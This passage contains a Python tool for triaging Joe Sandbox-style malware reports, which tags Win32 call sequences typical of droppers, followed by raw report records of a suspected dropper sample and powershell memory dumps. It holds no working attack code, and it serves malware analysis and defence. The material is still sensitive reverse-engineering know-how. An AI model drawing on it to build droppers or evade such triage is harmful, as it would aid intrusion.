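        """Lowest call-site address, a usable stand-in for the function's location."""
        return min(c.ref for c in self.calls)


def _base(name: str) -> str:
    """Fold the ANSI/Unicode suffix so RegSetValueExA and RegSetValueExW compare equal."""
    return re.sub(r"[AW]$", "", name)


def _hex(s: str):
    try:
        return int(s, 16)
    except ValueError:
        return None  # "?" or a path, not a recovered numeric argument


def parse_records(text: str) -> list:
    """One FunctionRecord per 'APIs' header; arguments are split on ',' (paths here contain none)."""
    records, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            current = FunctionRecord()
            records.append(current)
        elif line in OTHER_SECTIONS:
            current = None
        elif current is not None and (m := API_RE.match(line)):
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            current.calls.append(ApiCall(m["api"], m["module"], args, int(m["ref"], 16)))
    return records


def tag_record(rec: FunctionRecord) -> list:
    """Name the Win32 call sequences a reverser looks for in installer/dropper stubs."""
    seen = {_base(c.api) for c in rec.calls}
    tags = []
    if "RegSetValueEx" in seen and seen & {"RegCreateKeyEx", "RegOpenKeyEx"}:
        tags.append("registry-value-write")
    if "RegDeleteKey" in seen:
        tags.append("registry-key-delete" + ("-recursive" if "RegEnumKey" in seen else ""))
    if {"lstrlen", "CharPrev", "lstrcat"} <= seen:
        tags.append("path-append")
    for c in rec.calls:
        # SendMessage(hwnd, msg, wParam, lParam): the message id is the second argument
        if _base(c.api) == "SendMessage" and len(c.args) > 1 and _hex(c.args[1]) == STM_SETIMAGE:
            tags.append("dialog-image-set(STM_SETIMAGE)")
    return tags


def summarize(text: str) -> dict:
    """Map each record's start address (as printed in the report) to its tags."""
    return {f"{r.start:08X}": tag_record(r) for r in parse_records(text) if r.calls}


# Excerpt copied from the report records above (constructed test input for this example).
REPORT_EXCERPT = r"""
APIs
• RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00402A9B
• RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402AD7
• RegCloseKey.ADVAPI32(?), ref: 00402AE0
• RegCloseKey.ADVAPI32(?), ref: 00402B05
• RegDeleteKeyA.ADVAPI32(?,?), ref: 00402B23
Memory Dump Source
• Source File: 00000000.00000002.143838009075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
APIs
• GetDlgItem.USER32(?), ref: 00401CE2
• GetClientRect.USER32(00000000,?), ref: 00401CEF
• LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401D10
• SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D1E
• DeleteObject.GDI32(00000000), ref: 00401D2D
APIs
• lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004030FC,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 004057A7
• CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004030FC,004032FF), ref: 004057B0
• lstrcatA.KERNEL32(?,00409014), ref: 004057C1
Strings
• C:\Users\user\AppData\Local\Temp\, xrefs: 004057A1
APIs
• RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023A2
• lstrlenA.KERNEL32(00409C10,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023C2
• RegSetValueExA.ADVAPI32(?,?,?,?,00409C10,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023FB
• RegCloseKey.ADVAPI32(?,?,?,00409C10,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024D8
"""

if __name__ == "__main__":
    for addr, tags in summarize(REPORT_EXCERPT).items():
        print(addr, ", ".join(tags) or "-")
```

Feed it the text of a whole "Execution Graph" / function listing to get one line per function; the untagged ones can be skipped on a first pass, and the tagged addresses go straight into IDA or the report's own function view. Argument recovery in these reports is partial, so the tagger keys on call sequences and on the few arguments that are reliably numeric (the message id), never on handles or buffer pointers.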
APIs
• CharNextA.USER32(?,?,C:\,?,004058A6,C:\,C:\,75083410,?,C:\Users\user\AppData\Local\Temp\,004055F1,?,75083410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405848
• CharNextA.USER32(00000000), ref: 0040584D
• CharNextA.USER32(00000000), ref: 00405861
Strings
Memory Dump Source
• Source File: 00000000.00000002.143838009075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.143837980480.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838035765.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838063586.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838063586.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838063586.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838063586.000000000043C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838195025.000000000043E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rPO3799039985.jbxd
Similarity
• API ID: CharNext
• String ID: C:\
• API String ID: 3213498283-3404278061
• Opcode ID: b52e97735ebcacdda31b679af32a6ceda5c9d10ed76b2852ac30fc4ce6ba53e1
• Instruction ID: 19ae957cdd7e66f1aaea138ca2c8f088f7fbe10d55ad18dca4d2112a8e91772d
• Opcode Fuzzy Hash: b52e97735ebcacdda31b679af32a6ceda5c9d10ed76b2852ac30fc4ce6ba53e1
• Instruction Fuzzy Hash: 7FF0C253904F506EFB3272640C44B775B98CB55390F18C47BED90A62C1827C4C604F9A
APIs
• DestroyWindow.USER32(00000000,00000000,00402DE2,00000001), ref: 00402C15
• GetTickCount.KERNEL32 ref: 00402C33
• CreateDialogParamA.USER32(0000006F,00000000,00402B7F,00000000), ref: 00402C50
• ShowWindow.USER32(00000000,00000005), ref: 00402C5E
Memory Dump Source
• Source File: 00000000.00000002.143838009075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.143837980480.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838035765.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838063586.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838063586.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838063586.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838063586.000000000043C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838195025.000000000043E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rPO3799039985.jbxd
Similarity
• API ID: Window$CountCreateDestroyDialogParamShowTick
• String ID:
• API String ID: 2102729457-0
• Opcode ID: 42481ae060c013658952b0ba65f2133d3ed78682e8b262a627202bc2b689c50f
• Instruction ID: 1b84634240e2166e3851fbc92cd381e461e1db94d3428fd6ef6110bf0b183a31
• Opcode Fuzzy Hash: 42481ae060c013658952b0ba65f2133d3ed78682e8b262a627202bc2b689c50f
• Instruction Fuzzy Hash: 97F05E30A09220EFD6317B20FE4CD9F7BA4BB04B15B404976F104B11EAC7782882CB9D
APIs
• IsWindowVisible.USER32(?), ref: 00404EEB
• CallWindowProcA.USER32(?,?,?,?), ref: 00404F3C
  • Part of subcall function 00403F60: SendMessageA.USER32(000103DC,00000000,00000000,00000000), ref: 00403F72
Strings
Memory Dump Source
• Source File: 00000000.00000002.143838009075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.143837980480.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838035765.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838063586.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838063586.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838063586.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838063586.000000000043C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838195025.000000000043E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rPO3799039985.jbxd
Similarity
• API ID: Window$CallMessageProcSendVisible
• String ID:
• API String ID: 3748168415-3916222277
• Opcode ID: 44c7124f25b7d0e2ad082f453cfb3c7493e33a8b49738481f167c29b071f4aa1
• Instruction ID: 2a78fc1f4cbdadc5126368fc20cebde0bfb6f5e986cb98bc8d814c8ad8ef1b08
• Opcode Fuzzy Hash: 44c7124f25b7d0e2ad082f453cfb3c7493e33a8b49738481f167c29b071f4aa1
• Instruction Fuzzy Hash: 6D01F7B150420AAFEF20AF51DE80A5B3766E7C4751F284037FB00762D0C3799C51966D
APIs
• FreeLibrary.KERNEL32(?,75083410,00000000,C:\Users\user\AppData\Local\Temp\,004035F2,0040340C,?), ref: 00403634
• GlobalFree.KERNEL32(00000000), ref: 0040363B
Strings
• C:\Users\user\AppData\Local\Temp\, xrefs: 0040361A
Memory Dump Source
• Source File: 00000000.00000002.143838009075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.143837980480.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838035765.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838063586.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838063586.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838063586.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838063586.000000000043C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838195025.000000000043E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rPO3799039985.jbxd
Similarity
• API ID: Free$GlobalLibrary
• String ID: C:\Users\user\AppData\Local\Temp\
• API String ID: 1100898210-3355392842
• Opcode ID: dccbf9c36de3459267eb1af99735bed06c7a158201479be104942c1c24015bd8
• Instruction ID: 1a9bfca33d817e772708c534a1c0ef1eeb9da564593c1c7aee7843147688a1a4
• Opcode Fuzzy Hash: dccbf9c36de3459267eb1af99735bed06c7a158201479be104942c1c24015bd8
• Instruction Fuzzy Hash: 60E08C329050606BC6316F15ED04B2E76A9AB48B22F42006AEA407B3A08B756C424BCC
APIs
• lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402CD2,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\rPO3799039985.exe,C:\Users\user\Desktop\rPO3799039985.exe,80000000,00000003), ref: 004057EE
• CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402CD2,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\rPO3799039985.exe,C:\Users\user\Desktop\rPO3799039985.exe,80000000,00000003), ref: 004057FC
Strings
Memory Dump Source
• Source File: 00000000.00000002.143838009075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.143837980480.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838035765.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838063586.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838063586.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838063586.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838063586.000000000043C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838195025.000000000043E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rPO3799039985.jbxd
Similarity
• API ID: CharPrevlstrlen
• String ID: C:\Users\user\Desktop
• API String ID: 2709904686-3370423016
• Opcode ID: cad1fee570528055bb4f840757e41c2b2d093a40416f1971c342fc3ba500c074
• Instruction ID: 563d0c8124584ba78a4db43b9ec919a88ee2b9567cf051c7da1bb821b6b33a35
• Opcode Fuzzy Hash: cad1fee570528055bb4f840757e41c2b2d093a40416f1971c342fc3ba500c074
• Instruction Fuzzy Hash: 48D0A773808D705FF34362109C04B8F6B48CF12740F094062E140A71D0C2780C414BBD
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405B64,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405917
                                                                                                                                                                                                          • lstrcmpiA.KERNEL32(00000000,00000000), ref: 0040592F
                                                                                                                                                                                                          • CharNextA.USER32(00000000,?,00000000,00405B64,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405940
                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000,?,00000000,00405B64,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405949
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.143838009075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.143837980480.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838035765.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838063586.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838063586.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838063586.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838063586.000000000043C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838195025.000000000043E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_rPO3799039985.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 190613189-0
                                                                                                                                                                                                          • Opcode ID: d250403eeccc32afa1460bd507a63d74f6ad2c43926490d4129708a4008c1f50
                                                                                                                                                                                                          • Instruction ID: 9438e9cad6691fea7f13f8d56426e11099e03f26c07faecbb185dc05f13043cf
                                                                                                                                                                                                          • Opcode Fuzzy Hash: d250403eeccc32afa1460bd507a63d74f6ad2c43926490d4129708a4008c1f50
                                                                                                                                                                                                          • Instruction Fuzzy Hash: D5F06236505518FFCB129FA5DC00D9EBBA8EF16360B2540B9F800F7350D674EE01ABA9
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000002.00000002.144027903182.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7730000_powershell.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: 4'kq$4'kq$4'kq$4'kq$4'kq
                                                                                                                                                                                                          • API String ID: 0-2312759404
                                                                                                                                                                                                          • Opcode ID: ff0ba42482028c54c5c324e3bd5f8888e345c940c04b411266a8bdddb00cbfa1
                                                                                                                                                                                                          • Instruction ID: ddc522af6ac3a85bcb7f31b5e645e226f1e8c96a84d95adb38723072d57e0788
                                                                                                                                                                                                          • Opcode Fuzzy Hash: ff0ba42482028c54c5c324e3bd5f8888e345c940c04b411266a8bdddb00cbfa1
                                                                                                                                                                                                          • Instruction Fuzzy Hash: EF0322B4A00219DFDB24DB64C850BE9BBB2FF85344F1188A9D8596B781CB71ED81CF61
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000002.00000002.144018487368.0000000003260000.00000040.00000800.00020000.00000000.sdmp, Offset: 03260000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_3260000_powershell.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 5236bb3b05458c66f1bd9b2b35d47315f30ca2e61d551d89a22a4e2512ed22f9
                                                                                                                                                                                                          • Instruction ID: 79c0db8d0ca0a33378d41da55cce2e572a79f37c5bdca70e90a68d40e6890000
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5236bb3b05458c66f1bd9b2b35d47315f30ca2e61d551d89a22a4e2512ed22f9
                                                                                                                                                                                                          • Instruction Fuzzy Hash: F752AF74A2021ACFCB24DF65C944BADBBB6BF89204F1440A9E40AEB355DB709DC5CF91
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000002.00000002.144018487368.0000000003260000.00000040.00000800.00020000.00000000.sdmp, Offset: 03260000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_3260000_powershell.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: e8bebc2b8e9a3aa5c3c9b5a8242bc988fef9cc6f3abd6f087fb79875e9a8688f
                                                                                                                                                                                                          • Instruction ID: 4a942531f8516e420b919be0beb4bc51ea2e39f33513be06e614db1a119bb0f3
                                                                                                                                                                                                          • Opcode Fuzzy Hash: e8bebc2b8e9a3aa5c3c9b5a8242bc988fef9cc6f3abd6f087fb79875e9a8688f
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7B91D575B017589BDB2ADFB48A005AE77F2EFC4600B008D2ED052AB394DF38AD058BD5
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000002.00000002.144018487368.0000000003260000.00000040.00000800.00020000.00000000.sdmp, Offset: 03260000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_3260000_powershell.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 51aa0db47bbf8ff94d0b8023969cf435a7903e89eb82e19ebf4ba34426826000
                                                                                                                                                                                                          • Instruction ID: dda86c000517769cd31ef9f2f10e31c1c9fef6557880a0e90453a8647dbe7cc2
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 51aa0db47bbf8ff94d0b8023969cf435a7903e89eb82e19ebf4ba34426826000
                                                                                                                                                                                                          • Instruction Fuzzy Hash: AD91B375B017589BDB29DFB48A415AFB7F2EFC4600B00892DD056AB358DF38AD058BC5
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000002.00000002.144018016839.000000000310D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0310D000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_310d000_powershell.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: ff3df42cc3bf3b1e76ded1260b8d565eaf72a657a4d4d3ad96bbc357a4538a6b
                                                                                                                                                                                                          • Instruction ID: 393daa09977b8655649165f3f367dece4b265643d7ccc1fbb8714014139f15fb
                                                                                                                                                                                                          • Opcode Fuzzy Hash: ff3df42cc3bf3b1e76ded1260b8d565eaf72a657a4d4d3ad96bbc357a4538a6b
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9321DE76504200EFCB25DF64D9C1B26BBA5FB8C324F28C5A9E8090E286C776D857CB61
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000002.00000002.144027903182.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7730000_powershell.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: 4'kq$4'kq$4'kq$4'kq$4'kq$4'kq$4'kq$4'kq$4'kq$4'kq$4'kq$4'kq$4'kq$4'kq$4'kq$4'kq$4'kq$4'kq$4'kq$4'kq
                                                                                                                                                                                                          • API String ID: 0-306633379
                                                                                                                                                                                                          • Opcode ID: 815e6dd919e4fc3aaa20030d07ff58690c20028f93c1326673258c0a70255e40
                                                                                                                                                                                                          • Instruction ID: 73370abac0eedcb94b0b2f11c1270751b7c4c7c838da0fbdbf0f9f758c4d8ac5
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 815e6dd919e4fc3aaa20030d07ff58690c20028f93c1326673258c0a70255e40
                                                                                                                                                                                                          • Instruction Fuzzy Hash: BB928EB0A01314DFDB14CBA8C454BA9BBF2BB85345F258869D9056F396CB75EC82CF60
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000002.00000002.144033826196.00000000093D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 093D0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_93d0000_powershell.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: 4'kq$4'kq$4'kq$4'kq$tPkq$tPkq$$kq$$kq$$kq$$kq$$kq$$kq$$kq$$kq$$kq
                                                                                                                                                                                                          • API String ID: 0-1734347949
                                                                                                                                                                                                          • Opcode ID: 5abd9ebef893b6abd214c36843a970e900059ed5b12cdd11c007f8f66e444056
                                                                                                                                                                                                          • Instruction ID: 4f54bc83b71cbe2ac38bfedff0852d9897c70e04432a2fea2cc71786a764c794
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5abd9ebef893b6abd214c36843a970e900059ed5b12cdd11c007f8f66e444056
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0532E636B06204DFDB28CFA8D4606AABBE6BF85350F148469E8059B755CB35DC81CFA1
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000002.00000002.144027903182.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7730000_powershell.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: 4'kq
                                                                                                                                                                                                          • API String ID: 0-3255046985
                                                                                                                                                                                                          • Opcode ID: 55f46c356c5b00efd96897c95488ec46098f986c453862ceba384817315f1c1e
                                                                                                                                                                                                          • Instruction ID: bbb1a6f8e27996890d5e8f6885f04867a1da1e1a2e09501d8a9ed58010a97e88
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 55f46c356c5b00efd96897c95488ec46098f986c453862ceba384817315f1c1e
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6B525DB4A00254DFD724DF54C850BAABBB2BF85304F20CDA9D85A6B745CB71AD81CFA1
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000002.00000002.144027903182.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7730000_powershell.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: 4'kq
                                                                                                                                                                                                          • API String ID: 0-3255046985
                                                                                                                                                                                                          • Opcode ID: 45454b718d9af75146b97ae132847c5cede5d36905e0c38a0cb18a8a78dcbbe7
                                                                                                                                                                                                          • Instruction ID: 2d7a09c4c91c1b5e9d77d25a842ead2ae150235205f8bb2fae2f1384eb2be1d7
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 45454b718d9af75146b97ae132847c5cede5d36905e0c38a0cb18a8a78dcbbe7
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 944242B4A012189FD724DB54D950BEABBF2FF85304F1088A9D8596B781CB71ED81CF61
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000002.00000002.144027903182.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7730000_powershell.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: 4'kq
                                                                                                                                                                                                          • API String ID: 0-3255046985
                                                                                                                                                                                                          • Opcode ID: d85fcad241e7c02a34ac6b728367ac92ae50a518d655ce6e06f8454f4915d324
                                                                                                                                                                                                          • Instruction ID: 79dc7367ff500e865059d5eb4c315f888479644da1e417530f7265570655e73a
                                                                                                                                                                                                          • Opcode Fuzzy Hash: d85fcad241e7c02a34ac6b728367ac92ae50a518d655ce6e06f8454f4915d324
                                                                                                                                                                                                          • Instruction Fuzzy Hash: A2121CB4A00219DFEB34CB64C850BE9B7B2FB45344F1188A9D859AB781DB71ED81CF61
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000002.00000002.144027903182.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7730000_powershell.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: 4'kq
                                                                                                                                                                                                          • API String ID: 0-3255046985
                                                                                                                                                                                                          • Opcode ID: 0f100e80176935981fa1d351dfc029dd40f124a33b5f011e758145856a7931d9
                                                                                                                                                                                                          • Instruction ID: 94459f1390c6ddd43130360d74851e00d589dbad54a92fd07c9e54bbca718ab1
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0f100e80176935981fa1d351dfc029dd40f124a33b5f011e758145856a7931d9
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 90122CB4A00219DFEB34CB64C850BE9B7B2FB45344F1188A9D859AB781DB71ED81CF61
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000002.00000002.144033826196.00000000093D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 093D0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_93d0000_powershell.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: 4'kq
                                                                                                                                                                                                          • API String ID: 0-3255046985
                                                                                                                                                                                                          • Opcode ID: 32df5be7579d07325674fe682ea6e441782c32d6ec981906182d8fad46253dd3
                                                                                                                                                                                                          • Instruction ID: 7eefcbcfe29250add04cd50234fdd61ef41f74ebe42f295b93b4a10658aa1a87
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 32df5be7579d07325674fe682ea6e441782c32d6ec981906182d8fad46253dd3
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8521E773B0A2049BEB685AE554217BA7ADA6F81380F154029E8459B681EB35C981CFF2
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000002.00000002.144018487368.0000000003260000.00000040.00000800.00020000.00000000.sdmp, Offset: 03260000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_3260000_powershell.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: (&kq
                                                                                                                                                                                                          • API String ID: 0-3641282905
                                                                                                                                                                                                          • Opcode ID: 939684e5acc306e72aed9c0a9f4a6b7596187cba5c50385ff8047ddf5a5de6e8
                                                                                                                                                                                                          • Instruction ID: 60e9f5610022f6f49e22a141ce748405b9763e91d5c960de3a619d70f7b25732
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 939684e5acc306e72aed9c0a9f4a6b7596187cba5c50385ff8047ddf5a5de6e8
                                                                                                                                                                                                          • Instruction Fuzzy Hash: ED21AE75A042588FCB10DBAED45079FBFF5AF89320F29846ED419E7340CB74A885CBA5
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000002.00000002.144018487368.0000000003260000.00000040.00000800.00020000.00000000.sdmp, Offset: 03260000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
